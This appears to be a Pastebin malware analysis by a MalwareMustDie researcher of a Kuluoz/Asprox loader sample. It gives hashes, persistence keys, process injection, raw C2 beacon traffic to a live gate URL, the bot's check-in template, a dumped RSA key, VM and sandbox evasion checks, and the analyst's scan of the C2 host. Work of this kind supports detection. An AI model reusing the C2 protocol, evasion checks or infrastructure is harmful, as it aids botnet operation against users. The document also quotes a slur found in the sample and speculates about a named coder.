Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -----------------------------------------------------------
- Sample : sample.exe
- MD5 : 0d173908dee410a2a42a983ff77a7264
- SHA256 : fef7a0185f3cc2467642f08156f6670ab8cd24b1201e864b878c905aee8514dc
- REF : https://www.virustotal.com/en/file/fef7a0185f3cc2467642f08156f6670ab8cd24b1201e864b878c905aee8514dc/analysis/
- http://www.threatexpert.com/report.aspx?md5=0d173908dee410a2a42a983ff77a7264
- Date: Tuesday January 14 2014 -- 20:25:28 +02:00
- -----------------------------------------------------------
- // Autostart:
- <8e0374 >>> Software\Microsoft\Windows\CurrentVersion\Run
- Injects files into Windows application Hide sources
- Source: C:\WINDOWS\system32\svchost.exe
- Injected file: C:\WINDOWS\system32\notepad.exe
- //Wellknown string :-)
- 412155 >>> C KEY----- Unknown ERROR! Please wait and try again later.
- // PCAP in ASCII..
- // REQUEST:
- GET /DCC523DC84BAA5FDF7856F98F7905F8883B2C863C0 HTTP/1.1
- Accept: */*
- Content-Type: application/x-www-form-urlencoded
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
- Host: 66.255.131.164:8080
- Content-Length: 321
- Cache-Control: no-cache
- G嘸V畳PD・栃^MヒV_瓶52&桒I注
- 浩v<|モタqョZ柁疊lャXc・貌ス慌J・ェC56n詆*紮テ%マッ.・イツー・]テsー0
- 疊u.・6フ]「花yセワYオ〔?ケ aナテチX磧d卍7緘藪F[oミ7ハ峯.盧裸ィ莇!wゥ萠アニ簫ヤ癪|テq<)U゙越bヤメヌ0オ゚ハ・鮪@・アォwg
- !裾*#)参H・ォ些+Uウ4ck市[02ノ鍰・゙腑)琵㏍・・'t﨏キ孅・アサ恷M・zムヲ!薔剿eカC・・ユRヒユ 6 6 !・Ex}{ヨノS E (・@ @ナqBΖタィ ・ャ晧te-,モP=>・ ・ユR忘
- レ レ !・Ex}{ヨノS E フ・@ @テフBΖタィ ・ャ晧te-,モP=>・
- Data Raw: 80 00 00 00 47 9a 7e 56 f1 86 8f f4 50 f8 57 44 fb 2d 93 c8 5e 4d cb 56 5f 95 72 35 32 26 fa e3 49 92 0d 8d 5f 76 3c 7c d3 c0 71 ae 5a 91 c6 e1 67 6c 04 ac 58 63 fa 38 96 65 bd 8d 51 4a 88 65 aa 43 17 f1 d8 35 1d 36 6e e6 68 2a e3 46 1c c3 0b 25 fd f8 8e 1f cf af 2e 98 3d b2 c2 b0 fc c8 5d c3 73 b0 08 f1 5e 30 0a e1 67 75 7f 2e fc bf f7 a0 36 cc 5d a2 89 d4 79 be f0 e9 dc f4 f1 59 b5 81 6b 3f b9 00 00 00 61 a0 c5 c3 c1 03 58 e2 40 64 99 c2 37 e3 67 fe 1a 1a 03 e5 4d 46 81 6d 04 6f d0 37 ca 95 f5 18 f4 5a 1d 2e e1 b8 97 87 a8 e4 b4 21 77 a9 e4 cc b1 18 c6 e2 d2 d4 7f f7 80 e1 9b 7c c3 01 0e 71 3c 29 55 de 89 7a 1b 62 d4 d2 c7 30 b5 df ca ea be 96 8e 0e 40 84 13 b1 ab 77 67 0d 21 90 9e 2a f1 9c 12 23 f5 65 29 15 8e 51 48 97 19 ab 8d b1 2b 55 b3 34 63 6b 8e 73 19 5b 30 fe f4 a4 32 08 c9 ee c3 1b f1 2b de fd e4 44 29 94 fa 87 83 17 86 c7 e8 28 27 74 f5 b4 fa 9b b7 9b 70 1c ef b3 b1 bb 9c 8e 4d e8 14 7a d1 0f a6 f8 41 21 f1 ea e5 4b 99 96 65 b6 43 eb 76
- // RESPONSE
- HTTP/1.1 200 OK
- Server: nginx/1.2.6
- Date: Tue, 14 Jan 2014 10:51:23 GMT
- Content-Type: text/html; charset=utf-8
- Transfer-Encoding: chunked
- Connection: close
- f5
- ミLHb」
- レ・・Xt!RF億・リモ・)釣w鎗ワ@ts婆a苞:ZCq\゙,驢・GQサc(蘂^タhk攪_yテoオ 低q,S何*・ヤ勀ク匠酣ヘ・レ|舶a。愚トウ・ト5・掵ヌ{C ・=Pm aナテチX磧dム・喩6Zオ]・ュ痿ナAjオlー汰柀」
- コ0!{h-Bトェォゥ・メpQモMFkR・/サvラ・濶・ュ7\セW8p1募ソルタ*ー7*:_鰭ソロ|・
- 0・ユR秦
- < < }{ヨノS !・Ex E (テ@ oュタィ BΖャ親-,モ晧・P[Oカ ・ユR
- 6 6 !・Ex}{ヨノS E (・@ @ナoBΖタィ ・ャ晧・e-,ヤP=>・ ・ユRルa
- < < }{ヨノS !・Ex E (ナ@ oォタィ BΖャ親-,ヤ晧・P[Oオ
- Data Raw: 66 35 0d 0a 80 00 00 00 d0 4c 48 62 a3 0a da 83 e3 89 3a 58 74 21 52 46 89 ad 88 fd 7f d8 d3 84 26 29 92 de 77 91 99 dc 40 0c 74 73 94 6b 61 e4 9a 3a 5a 43 06 71 5c de 2c e9 86 ee 1b 47 51 bb 63 f9 c0 28 e5 41 5e c0 68 6b 9d 98 5f 79 c3 6f b5 20 f9 e1 92 e1 71 2c 53 89 bd 15 2a 92 2d d4 fa 87 b8 8f a0 e7 c5 cd 85 18 da 7c 94 95 61 a1 8b f0 c4 b3 ec 0f c4 35 87 fb 9d 7d c7 7b 43 02 00 e4 21 3d f0 85 50 80 6d 00 00 00 61 a0 c5 c3 c1 03 58 e2 40 64 d1 f3 2c 9a 67 fe 36 5a 03 b5 5d f9 25 ad e1 7e fd c5 41 6a b5 6c b0 f8 9e 91 bf fa e4 a3 0d ba 30 21 7b 68 2d 1f 42 18 c4 aa ab a9 96 13 d2 70 51 d3 4d 46 6b f9 45 52 8a 2b 2f bb f3 7a 14 76 d7 0f a5 e8 89 f3 2d ff ad 37 5c be 57 38 70 31 95 e5 bf d9 c0 2a b0 37 2a 3a 5f 95 68 01 fe bf db 7c ef 0d 0a 30 0d 0a 0d 0a
- // URL Decoded:
- POST /DCC523DC84BAA5FDF7856F98F7905F8883B2C863C0 HTTP/1.1
- 2f 69 6e 64 65 78 2e 70 68 /index.ph
- 70 3f 72 3d 67 61 74 65 p?r=gate
- PS: They decoded those in memory too, lame:
- 8e06b4 >>> /index.php?r=gate
- // Testing CNC..
- URL: h00p://66.255.131.164:8080/index.php?r=gate <=== Alive!!!!!!!!!!
- Tue Jan 14 20:05:53 JST
- 2014|66.255.131.164|uslec-66-255-131-164.cust.uslec.net.|1785 |
- 66.255.128.0/18 | AS-PAETEC-NET | US | USLEC.NET | TDARX INC
- (Hello USA..)
- $ ping 66.255.131.164
- PING 66.255.131.164 (66.255.131.164): 56 data bytes
- 64 bytes from 66.255.131.164: icmp_seq=0 ttl=44 time=305.283 ms
- 64 bytes from 66.255.131.164: icmp_seq=1 ttl=44 time=189.028 ms
- [...]
- $ NMAP BLAH..
- Nmap scan report for uslec-66-255-131-164.cust.uslec.net (66.255.131.164)
- Host is up (0.19s latency).
- Not shown: 996 closed ports
- PORT STATE SERVICE
- 22/tcp open ssh
- 53/tcp open domain
- 8080/tcp open http-proxy
- 9102/tcp open jetdirect
- // How SAMPLE is using encryption:
- // Source: C:\WINDOWS\system32\svchost.exe
- // Code function: 1_2_008D23D0 (Binary ADDRESS)
- CryptEncrypt,malloc,
- CryptEncrypt,CryptCreateHash,
- CryptHashData,
- CryptVerifySignatureA,malloc,free,
- CryptDestroyHash,
- // The trace of Public key dumped from memory:
- 8e3040 >>> -----BEGIN PUBLIC KEY-----
- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCUAUdLJ1rmxx+bAndp+Cz6+5I
- Kmgap2hn2df/UiVglAvvg2US9qbk65ixqw3dGN/9O9B30q5RD+xtZ6gl4ChBquqw
- jwxzGTVqJeexn5RHjtFR9lmJMYIwzoc/kMG8e6C/GaS2FCgY8oBpcESVyT2woV7U
- 00SNFZ88nyVv33z9+wIDAQAB -----END PUBLIC KEY
- // Testing interesting strings decrypted in registry:
- 8e041c >>> For base!!!!!
- 8e1114 >>> You fag!!!!!
- ^^^ It looks like so many moronz like to use this "fag" words..
- decoding method works.
- // The template data sent to botnet:
- <knock><id>%s</id><group>%s</group><src>%d</src><transport>%d</transport>
- <time>%d</time><version>%d</version><status>%d</status><debug>%s</debug><
- /knock>
- // PS: I think I fouund the trace lead to the CODER of Kuluoz:
- C:\Users\DmitryHELL\Documents\SysIQUA\loader_1.4
- r\loader_v4\loader_v3\Release\
- <unixfreaxjp> ^^^^ See that "DmitryHELL" ?
- // notes:
- Herrcore decoded nicely: http://herrcore.blogspot.ca/2014/01/inside-new-asproxkuluoz-october-2013.html
- tHIS sample is the same blocks, so they dont upgrade it yet :-)
- Quoted "Examining the response we can see the first 4 bytes of the
- response body represent the length of the RSA signed hash of the data
- (little endian) 0x00000080. This is followed by the RSA signed hash. The
- RSA signed hash is followed by another 4 bytes that represent the length
- of the RC4 encrypted data 0x00000069. These 4 bytes are then followed by
- the RC4 encrypted data." <-- this should work.
- // PCAP download:
- <unixfreaxjp> here's the PCAP: https://www.mediafire.com/?f0qsp4exa1azfgf
- // Kernel debugger checks:
- C:\WINDOWS\system32\svchost.exe System information
- queried: KernelDebuggerInformation
- // Vbox checks:
- svchost.exe : VBoxTray.exe
- svchost.exe : HARDWARE\ACPI\DSDT\VBOX__
- svchost.exe : vmusrvc.exe
- svchost.exe : VMwareDragDetWndClass
- svchost.exe : VBoxService.exe
- VM detection calls:
- 916): 8e0aa8 >>> vmtoolsd.exe
- 957): 8e0b4c >>> VMware
- 962): 8e0b94 >>> VMware
- 1093): 8e0b14 >>> vmsrvc.exe
- 1171): 8e0bcc >>> VMware
- 1208): 8e0b08 >>> vmusrvc.exe
- 1262): 8e0a70 >>> VMwareDragDetWndClass
- 1314): 8e0a88 >>> VMwareSwitchUserControlClass
- // Sandbox evasion, long sleeps:
- Source: C:\WINDOWS\system32\svchost.exe
- Thread delayed: delay time: -600
- // Detect wireshark:
- (1351): 8e0908 >>> wireshark.exe
- // etc evasion:
- 8e08a4 >>> SELECT * FROM FirewallProduct
- 8e07e0 >>> SELECT * FROM AntiVirusProduct
- // DLL loaded:
- /// KNown....
- (3): WINSPOOL.DRV
- (4): ShimEng.dll
- (5): WINMM.dll
- (6): MSACM32.dll
- (7): UxTheme.dll
- (8): kernel32.dll
- (13): comdlg32.dll
- (14): ADVAPI32.dll
- (15): RPCRT4.dll
- (16): Secur32.dll
- (18): msvcrt.dll
- (19): GDI32.dll
- (20): USER32.dll
- (21): SHLWAPI.dll
- (22): SHELL32.dll
- (30): ole32.dll
- (31): OLEAUT32.dll
- (33): VERSION.dll
- (34): USERENV.dll
- // etc DLL...dunno these..
- (17): C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll 773A0000 1060864
- (24): C:\WINDOWS\system32\shimeng.dll 5CF00000 155648
- (26): C:\WINDOWS\AppPatch\AcGenral.dll 3D0000 1855488
- (27): C:\WINDOWS\AppPatch\AcGenral.dll 3D0000 1855488
- (28): C:\WINDOWS\AppPatch\AcGenral.dll 6FD90000 1875968
- (29): C:\WINDOWS\system32\winmm.dll 76AF0000 188416
- (32): C:\WINDOWS\system32\msacm32.dll 77BB0000 86016
- (35): C:\WINDOWS\system32\uxtheme.dll 5B0F0000 229376
- (37): C:\WINDOWS\system32\imm32.dll 360000 110592
- (38): C:\WINDOWS\system32\imm32.dll 360000 110592
- (39): C:\WINDOWS\system32\imm32.dll 76330000 118784
- (43): C:\WINDOWS\system32\shell32.dll
- // Variable template list (forensics)
- (140): 41f215 >>> %Xe`
- (153): 41b7fa >>> %.ZM`
- (262): 41dd5d >>> r"%`
- (293): 422e2c >>> SymAgc Gain %f
- (577): 9f0a3 >>> ]=%1
- (664): 9f0e3 >>> ]=%1
- (698): 9f0a5 >>> %102
- (969): 8e0298 >>> http://%[^:]:%d/%s
- (1085): 8e0403 >>> ]=%1
- (1182): 8e0405 >>> %102
- (1193): 8e076c >>> %d.%d x%d
- (1258): 8e043c >>> %1024[^=]=%1024[^;]
- (1261): 8e0443 >>> ]=%1
- (1318): 8e06e8 >>> %[^:]:%d
- (1351): 8e03fc >>> %1024[^=]=%1024[^;]
- // Security bearch attempts..
- (423): 100357e >>> SetSecurityDescriptorGroup
- (428): 100215c >>> CoInitializeSecurityParam
- (440): 100359c >>> SetSecurityDescriptorOwner
- (451): 10035ba >>> InitializeSecurityDescriptor
- (468): 100333e >>> CoInitializeSecurity
- (473): 100354e >>> SetSecurityDescriptorDacl
- (517): 1003942 >>> NtQuerySecurityObject
- (544): 1003a32 >>> RtlGetDaclSecurityDescriptor
- // RAM Forensics Registry calls:
- // Aggressives:
- 411b2c >>> RegDeleteValueA
- a09bc >>> RegDeleteValueA
- 8e1d1c >>> RegDeleteValueA
- 411a9e >>> RegCreateKeyA
- a092e >>> RegCreateKeyA
- 8e1c8e >>> RegCreateKeyA
- // Points;
- Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
- Software\Microsoft\Windows NT\CurrentVersion\Svchost
- Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
- Software\Microsoft\Windows\CurrentVersion\Run
- Software\Microsoft\Windows NT\CurrentVersion
- SYSTEM\CurrentControlSet\Services
- SYSTEM\CurrentControlSet\services\Disk\Enum
- SYSTEM\CurrentControlSet\Enum\PCI\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00
- SYSTEM\CurrentControlSet\Enum\PCI\VEN_15AD&DEV_0774&SUBSYS_074015AD&REV_00
- SYSTEM\CurrentControlSet\Enum\PCI\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00
- SYSTEM\CurrentControlSet\Enum\PCI\VEN_5333&DEV_8811&SUBSYS_00000000&REV_00
- HARDWARE\ACPI\DSDT\AMIBI
- HARDWARE\ACPI\DSDT\VBOX__
- HARDWARE\ACPI\DSDT\PTLTD__
- HARDWARE\DESCRIPTION\System\BIOS
- HARDWARE\DESCRIPTION\System\BIOS
- HARDWARE\DESCRIPTION\System\BIOS
- HARDWARE\DESCRIPTION\System\BIOS
- // RAM Forensics - System Information Grabs PoC
- // Info:
- 8e1300 >>> bb10bd00-c135-11e2-b7ac-005056c00008
- 8e0a24 >>> 99929D61-1338-48B1-9433-D42A1D94F0D2
- 8e09cc >>> 99929D61-1338-48B1-9433-D42A1D94F0D2-x64
- 8e09f8 >>> 99929D61-1338-48B1-9433-D42A1D94F0D2-x32
- 8e0a24 >>> 99929D61-1338-48B1-9433-D42A1D94F0D2
- 8e12d8 >>> c540500f-c135-11e2-b348-005056c00008
- // Calls:
- a06ea >>> GetVolumeInformationW
- 8e1d5a >>> LookupAccountNameA
- 8e1d70 >>> GetUserNameA
- 8e0bb8 >>> SystemProductName
- 8e08e0 >>> displayName
- 8e0dac >>> SystemManufacturer
- // Drops: (this is under check..something looks went wrong during the drop captures..)
- MD5: 7BF167A337B794CC26FF3C2DFFD68113
- SHA: 6077966E1FAA4F92E1137AB1F9177E72DDD4AA40
- 0000 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 ........H.......
- 0010 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 ................
- 0020 80 BD A8 AF 8A 7D C9 11 BE F4 08 00 2B 10 29 89 .....}......+.).
- 0030 01 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 .....]..........
- 0040 2B 10 48 60 02 00 00 00 05 00 0B 07 10 00 00 00 +.H`............
- 0050 8B 00 3B 00 02 00 00 00 B8 10 B8 10 7A 38 00 00 ..;.........z8..
- 0060 01 00 00 00 01 00 01 00 36 00 61 20 22 FA CF 11 ........6.a "...
- 0070 98 23 00 A0 C9 11 E5 DF 01 00 00 00 04 5D 88 8A .#...........]..
- 0080 EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 ........+.H`....
- 0090 0A 06 00 00 D0 FA 0F 00 4E 54 4C 4D 53 53 50 00 ........NTLMSSP.
- 00A0 01 00 00 00 B7 B2 08 E2 0D 00 0D 00 2E 00 00 00 ................
- 00B0 06 00 06 00 28 00 00 00 05 01 28 0A 00 00 00 0F ....(.....(.....
- 00C0 39 32 37 35 33 37 41 52 42 45 49 54 53 47 52 55 927537ARBEITSGRU
- 00D0 50 50 45 05 00 10 03 10 00 00 00 64 00 48 00 02 PPE........d.H..
- 00E0 00 00 00 B8 10 B8 10 0A 06 00 00 D0 FA 0F 00 4E ...............N
- 00F0 54 4C 4D 53 53 50 00 03 00 00 00 00 00 00 00 48 TLMSSP.........H
- 0100 00 00 00 00 00 00 00 48 00 00 00 00 00 00 00 48 .......H.......H
- 0110 00 00 00 00 00 00 00 48 00 00 00 00 00 00 00 48 .......H.......H
- 0120 00 00 00 00 00 00 00 48 00 00 00 35 C2 88 E2 05 .......H...5....
- 0130 01 28 0A 00 00 00 0F .(.....
- // in Text..Quicky
- H クク スィッ笠ノセ・ +)・ ]・・ノ溯 +H`
- ・; ククz8 6 a "昕・ ノ裃 ]・・ノ溯 +H`
- ミ・ NTLMSSP キイ・
- . ( (
- 927537ARBEITSGRUPPE d H クク
- ミ・ NTLMSSP H H H H H H 5ツ遺(
- ( still working on this.. not final.. may contain mistakes & inaccuracies)
- ----
- #MalwareMustDie
- @unixfreaxjp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement